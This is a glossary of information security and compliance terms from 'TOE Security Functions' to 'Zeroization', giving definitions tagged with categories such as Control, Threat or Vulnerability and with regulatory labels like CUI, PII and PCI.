TOE Security FunctionsnounSet consisting of all hardware, software, and firmware of the TOE that must be relied upon for the correct enforcement of the TOE Security Policy (TSP).CapabilityRegulatedCUIMay 9, 2026
Tracking CookienounA cookie placed on a user’s computer to track the user’s activity on different Web sites, creating a detailed profile of the user’s behavior.DataRegulatedPIIMay 9, 2026
Traditional INFOSEC ProgramnounProgram in which NSA acts as the central procurement agency for the development and, in some cases, the production of INFOSEC items. This includes the Authorized Vendor Program. Modifications to the INFOSEC end-items used in products developed and/or produced under these programs must be approved by NSA.ProcessRegulatedCUIMay 9, 2026
trainingnounOrganized activity aimed at imparting information and/or instructions to improve the recipient's performance or to help him or her attain a required level of knowledge or skill.ProcessRegulatedMay 12, 2026
training materialnounPrinted or recorded information used in a training program.ArtifactRegulatedMay 12, 2026
transaction filenounA group of one or more computerized records containing current business activity and processed with an associated master file. Transaction files are sometimes accumulated during the day and processed in batch production overnight or during off-peak processing periods.DataRegulatedMay 12, 2026
transient cyber assetnounA Cyber Asset that (i) is capable of transmitting or transferring executable code, (ii) is not included in a BES Cyber System, (iii) is not a Protected Cyber Asset (PCA), and (iv) is directly connected (e.g., using Ethernet, serial, Universal Serial Bus, or wireless, including near field or Bluetooth communication) for 30 consecutive calendar days or less to a BES Cyber Asset, a network within an ESP, or a PCA. Examples include, but are not limited to, Cyber Assets used for data transfer, vulnerability assessment, maintenance, or troubleshooting purposes.SystemRegulatedCUIMay 9, 2026
transmission equipmentnounAny instruments required to electronically transfer data over a network.PhysicalRegulatedMay 9, 2026
Transmission SecuritynounMeasures (security controls) applied to transmissions in order to prevent interception, disruption of reception, communications deception, and/or derivation of intelligence by analysis of transmission characteristics such as signal parameters or message externals. Note: TRANSEC is that field of COMSEC which deals with the security of communication transmissions, rather than that of the information being communicated.ControlRegulatedCUIMay 9, 2026
Trap Doornoun1. A means of reading cryptographically protected information by the use of private knowledge of weaknesses in the cryptographic algorithm used to protect the data. 2. In cryptography, one-to-one function that is easy to compute in one direction, yet believed to be difficult to invert without special information.VulnerabilityRegulatedCUIMay 12, 2026
Triple-WrappednounS/MIME usage: data that has been signed with a digital signature, and then encrypted, and then signed again.DataRegulatedMay 12, 2026
Truncating bank (Check 21)nounThe financial institution that truncates the original check. If a person other than a financial institution truncates the original check, the truncating bank is the first financial institution that transfers, presents, or returns, in lieu of such original check, a substitute check or, by agreement with the recipient, information relating to the original check (including data taken from the MICR line of the original check or an electronic image of the original check), whether with or without the subsequent delivery of the original check.OrganizationRegulatedPCIMay 9, 2026
Trust ListnounThe collection of trusted certificates used by Relying Parties to authenticate other certificates.ArtifactRegulatedMay 9, 2026
Trusted Computer SystemnounA system that employs sufficient hardware and software assurance measures to allow its use for processing simultaneously a range of sensitive or classified information.SystemRegulatedCUIMay 9, 2026
Trusted DistributionnounMethod for distributing trusted computing base (TCB) hardware, software, and firmware components that protects the TCB from modification during distribution.ProcessRegulatedCUIMay 9, 2026
Trusted FoundrynounFacility that produces integrated circuits with a higher level of integrity assurance.PhysicalRegulatedCDIMay 9, 2026
Trusted Identification ForwardingnounIdentification method used in information system networks whereby the sending host can verify an authorized user on its system is attempting a connection to another host. The sending host transmits the required user authentication information to the receiving host.ControlRegulatedCUIMay 12, 2026
Trusted PathnounA mechanism by which a user (through an input device) can communicate directly with the security functions of the information system with the necessary confidence to support the system security policy. This mechanism can only be activated by the user or the security functions of the information system and cannot be imitated by untrusted software.ControlRegulatedMay 9, 2026
Trusted TimestampnounA digitally signed assertion by a trusted authority that a specific digital object existed at a particular time.ArtifactRegulatedMay 12, 2026
TSECnounTelecommunications Security.FrameworkRegulatedCUIMay 9, 2026
Two-Person ControlnounContinuous surveillance and control of positive control material at all times by a minimum of two authorized individuals, each capable of detecting incorrect and unauthorized procedures with respect to the task being performed and each familiar with established security and safety requirements.ControlRegulatedCUIMay 12, 2026
Two-Person IntegritynounSystem of storage and handling designed to prohibit individual access by requiring the presence of at least two authorized individuals, each capable of detecting incorrect or unauthorized security procedures with respect to the task being performed. See No-Lone Zone.ControlRegulatedCUIMay 9, 2026
Type 1 KeynounGenerated and distributed under the auspices of NSA for use in a cryptographic device for the protection of national security information.CredentialRegulatedCUIMay 9, 2026
Type 1 ProductnounCryptographic equipment, assembly or component classified or certified by NSA for encrypting and decrypting national security information when appropriately keyed. Developed using established NSA business processes and containing NSA-approved algorithms. Used to protect systems requiring the most stringent protection mechanisms.PhysicalRegulatedCUIMay 9, 2026
Type 2 KeynounGenerated and distributed under the auspices of NSA for use in a cryptographic device for the protection of unclassified information.CredentialRegulatedCUIMay 9, 2026
Type 2 ProductnounCryptographic equipment, assembly, or component certified by NSA for encrypting or decrypting sensitive information when appropriately keyed. Developed using established NSA business processes and containing NSA-approved algorithms. Used to protect systems requiring protection mechanisms exceeding best commercial practices including systems used for the protection of unclassified information.PhysicalRegulatedCUIMay 9, 2026
Type 3 KeynounUsed in a cryptographic device for the protection of unclassified sensitive information, even if used in a Type 1 or Type 2 product.CredentialRegulatedCUIMay 9, 2026
Type 3 ProductnounUnclassified cryptographic equipment, assembly, or component used, when appropriately keyed, for encrypting or decrypting unclassified sensitive U.S. government or commercial information, and to protect systems requiring protection mechanisms consistent with standard commercial practices. Developed using established commercial standards and containing NIST-approved cryptographic algorithms/modules or successfully evaluated by the National Information Assurance Partnership (NIAP).PhysicalRegulatedCUIMay 9, 2026
Type 4 KeynounUsed by a cryptographic device in support of its Type 4 functionality, i.e., any provision of key that lacks U.S. government endorsement or oversight.CredentialRegulatedCUIMay 9, 2026
Type 4 ProductnounUnevaluated commercial cryptographic equipment, assemblies, or components that neither NSA nor NIST certify for any government usage. These products are typically delivered as part of commercial offerings and are commensurate with the vendor’s commercial practices. These products may contain either vendor proprietary algorithms, algorithms registered by NIST, or algorithms registered by NIST and published in a FIPS.ArtifactRegulatedCUIMay 9, 2026
Type AccreditationnounA form of accreditation that is used to authorize multiple instances of a major application or general support system for operation at approved locations with the same type of computing environment. In situations where a major application or general support system is installed at multiple locations, a type accreditation will satisfy C&A requirements only if the application or system consists of a common set of tested and approved hardware, software, and firmware.ProcessRegulatedMay 9, 2026
Type CertificationnounThe certification acceptance of replica information systems based on the comprehensive evaluation of the technical and nontechnical security features of an information system and other safeguards, made as part of and in support of the formal approval process, to establish the extent to which a particular design and implementation meet a specified set of security requirements.ProcessRegulatedCUIMay 9, 2026
U.S. PersonnounFederal law and Executive Order define a U.S. Person as: a citizen of the United States; an alien lawfully admitted for permanent residence; an unincorporated association with a substantial number of members who are citizens of the U.S. or are aliens lawfully admitted for permanent residence; and/or a corporation that is incorporated in the U.S.IdentityRegulatedPIIMay 9, 2026
U.S.-Controlled FacilitynounBase or building to which access is physically controlled by U.S. individuals who are authorized U.S. government or U.S. government contractor employees.PhysicalRegulatedCUIMay 9, 2026
U.S.-Controlled SpacenounRoom or floor within a facility that is not a U.S.-controlled facility, access to which is physically controlled by U.S. individuals who are authorized U.S. government or U.S. government contractor employees. Keys or combinations to locks controlling entrance to U.S.-controlled spaces must be under the exclusive control of U.S. individuals who are U.S. government or U.S. government contractor employees.PhysicalRegulatedCUIMay 9, 2026
unapproved Information Technology resourcenounAn unsanctioned Information Technology resource.SystemRegulatedMay 9, 2026
unauthorized accessnounOccurs when a user, legitimate or unauthorized, accesses a resource that the user is not permitted to use.EventRegulatedMay 9, 2026
unauthorized access is detectednounThis Triggering Event takes place when a person, legitimate or unauthorized, accesses a resource that the person is not permitted to use or enters a facility or area the person is not permitted to enterEventRegulatedMay 9, 2026
unauthorized attemptnounA try at gaining access to a system without authorization or approval.EventRegulatedMay 9, 2026
unauthorized changenounA purposeful and perhaps unlawful modification of financial data to hide wrong-doing, loss or other disclosure.EventRegulatedMay 12, 2026
Unauthorized DisclosurenounAn event involving the exposure of information to entities not authorized access to the information.EventRegulatedMay 12, 2026
unauthorized mobile codenounA program (e.g., script, macro, or other portable instruction) that can be shipped unchanged to a heterogeneous collection of platforms and executed with identical semantics -- that has not been permitted by the controlling authority.ThreatRegulatedMay 9, 2026
unauthorized physical accessnounAccess to a building, room, site, etc that is not permitted.EventRegulatedMay 12, 2026
unauthorized softwarenounAn application or device driver who use is not been permitted by the controlling authority.ThreatRegulatedMay 12, 2026
unauthorized usenounUse of an asset for a person's own purpose without the consent of the owner.ThreatRegulatedMay 12, 2026
UnclassifiednounInformation that has not been determined pursuant to E.O. 12958, as amended, or any predecessor order, to require protection against unauthorized disclosure and that is not designated as classified.RequirementRegulatedCUIMay 9, 2026
unescorted accessnounNot having to be escorted to gain access to a facility, area, or system.ControlRegulatedMay 9, 2026
Uniform Rating System For Information TechnologynounAn internal rating system used by federal and state regulators to uniformly assess financial institution and service provider risks introduced by IT.FrameworkRegulatedMay 9, 2026
United States Government Configuration BaselinenounThe United States Government Configuration Baseline (USGCB) provides security configuration baselines for Information Technology products widely deployed across the federal agencies. The USGCB baseline evolved from the federal Desktop Core Configuration mandate. The USGCB is a Federal government-wide initiative that provides guidance to agencies on what should be done to improve and maintain an effective configuration settings focusing primarily on security.FrameworkRegulatedCUIMay 9, 2026
unnecessary default accountnounDefault accounts that are not necessary to be installed on the system.VulnerabilityRegulatedMay 12, 2026
unpatched softwarenounSoftware which has not undergone a vulnerability correction, a defect correction, or an improvement of code function.VulnerabilityRegulatedMay 9, 2026
unposted suspense itemnounA transaction that has not yet been processed, but may affect the amount of credit available.ArtifactRegulatedPCIMay 12, 2026
unsuccessful authentication attemptnounA failed attempt to receive authentication to access a system.EventRegulatedMay 9, 2026
Untrusted ProcessnounProcess that has not been evaluated or examined for correctness and adherence to the security policy. It may include incorrect or malicious code that attempts to circumvent the security mechanisms.ProcessRegulatedMay 12, 2026
USA Patriot ActnounThe USA PATRIOT Act (Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act of 2001 (Public Law Pub.L. 107-56), commonly known as the "Patriot Act", was enacted by Congress to deter and punish terrorist acts in the United States and around the world by enhancing the law enforcement investigatory tools of both domestic law enforcement and foreign intelligence agencies.RequirementRegulatedCUIMay 12, 2026
user access reviewnounA process that an organization implements to actively monitor and verify the appropriateness of a users' access to systems and applications based on an understanding of the minimum necessary for users to perform or support business activities or functions. The responsibility for granting access and performing periodic verification of the appropriateness of that access rests with the system and/or business owner of the system or application.ProcessRegulatedMay 9, 2026
user accountnounInformation that tells a computer which files and folders to access for a specific user, which personal preferences to have in place, and what can be accessed by the user.IdentityRegulatedMay 12, 2026
User account activitynounAll events and processes executed including logons and logouts associated with a system user account.IdentityRegulatedMay 12, 2026
User IDnounUnique symbol or character string used by an information system to identify a specific user.IdentityRegulatedPIIMay 12, 2026
User IdentificationnounThe process, control, or information by which a user identifies himself or herself to the system as a valid user (as opposed to authentication).ProcessRegulatedPIIMay 12, 2026
User InitializationnounA function in the life cycle of keying material; the process whereby a user initializes its cryptographic application (e.g., installing and initializing software and hardware).ProcessRegulatedCUIMay 9, 2026
User Partnership Program | noun | Partnership between the NSA and a U.S. government agency to facilitate development of secure information system equipment incorporating NSA-approved cryptography. The result of this program is the authorization of the product or system to safeguard national security information in the user’s specific application. | Process | Regulated, CUI | May 9, 2026
User Representative | noun | Individual authorized by an organization to order COMSEC keying material and interface with the keying system, provide information to key users, and ensure the correct type of key is ordered. | Role | Regulated, CUI | May 9, 2026
Verifier Impersonation Attack | noun | A scenario where the Attacker impersonates the Verifier in an authentication protocol, usually to capture information that can be used to masquerade as a Claimant to the real Verifier. | Threat | Regulated | May 9, 2026
Virtual private network | noun | Protected information system link utilizing tunneling, security controls (see Information Assurance), and endpoint address translation, giving the impression of a dedicated line. | Network | Regulated | May 12, 2026
virtual private network access | noun | Permission or ability for an external user to connect to a Virtual Private Network. | Control | Regulated | May 9, 2026
visitor access | noun | The processes and mechanisms of ensuring visitors are allowed in specific areas and with specific permissions. Mechanisms such as guarded entries, logged entry, badges, and escorting of visitors are common. | Process | Regulated | May 9, 2026
visitor control program | noun | A documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to identify, control, and reduce or eliminate the risks inherent to visitors. | Process | Regulated | May 9, 2026
visitor log | noun | A paper or electronic record of any non-employee entering a facility, construction site, structure or website. | Artifact | Regulated, CUI | May 9, 2026
visitor's name | noun | The given name of an individual who is visiting. | Data | Regulated, PII | May 9, 2026
Vulnerability Assessment | noun | Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation. | Vulnerability | Regulated | May 12, 2026
vulnerability scan | noun | The check of a system for known vulnerabilities from beginning to end, with resultant errors and status information. | Vulnerability | Regulated | May 12, 2026
Warehouse attack | noun | The compromise of systems that store authenticators. | Threat | Regulated, CUI | May 9, 2026
weakness | noun | An exception noted in tests of properly designed internal controls that may indicate ineffectiveness. Management must consider the extent of a weakness in such cases. Weaknesses can be classified as a simple deficiency, significant deficiency, or a material weakness. | Vulnerability | Regulated | May 12, 2026
Web Bug | noun | Malicious code, invisible to a user, placed on Web sites in such a way that it allows third parties to track use of Web servers and collect information about the user, including IP address, host name, browser type and version, operating system name and version, and Web browser cookie. | Threat | Regulated, PII | May 9, 2026
WEB SEC code | noun | An ACH debit entry initiated by an originator resulting from the receiver's authorization through the Internet to make a transfer of funds from a consumer account of the receiver. | Artifact | Regulated, PII | May 9, 2026
Website hosting | noun | The service of providing ongoing support and monitoring of an Internet-addressable computer that stores webpages and processes transactions initiated over the Internet. | System | Regulated | May 12, 2026
Wi-Fi Protected Access-2 | noun | The approved Wi-Fi Alliance interoperable implementation of the IEEE 802.11i security standard. For federal government use, the implementation must use FIPS-approved encryption, such as AES. | Control | Regulated | May 9, 2026
wire servicer | noun | A financial institution that offers electronic funds transfer service. | Organization | Regulated, PCI | May 12, 2026
wire transfer | noun | A transfer of funds between banks by electronic means. | Data | Regulated | May 12, 2026
Wireless phone | noun | See "Cellular Telephone". | Physical | Regulated | May 12, 2026
Wiretapping | noun | Monitoring and recording data that is flowing between two points in a communication system. | Threat | Regulated | May 12, 2026
work paper | noun | The written record of the basis for the auditor's conclusions that provides the support for the auditor's representations, whether those representations are contained in the auditor's report or otherwise. | Artifact | Regulated | May 9, 2026
Work transfer | noun | Work-transfer is a process whereby the staff located at a recovery site accepts the workload of staff located at a primary production site, and a data center located at a recovery site accepts the workload of the primary data processing site. | Process | Regulated | May 12, 2026
Write blocker | noun | A device that allows the acquisition of information on a drive without creating the possibility of accidentally damaging the drive. | Physical | Regulated | May 12, 2026
Zeroization | noun | A method of erasing electronically stored data, cryptographic keys, and Credentials Service Providers (CSPs) by altering or deleting the contents of the data storage to prevent recovery of the data. | Control | Regulated, CUI | May 9, 2026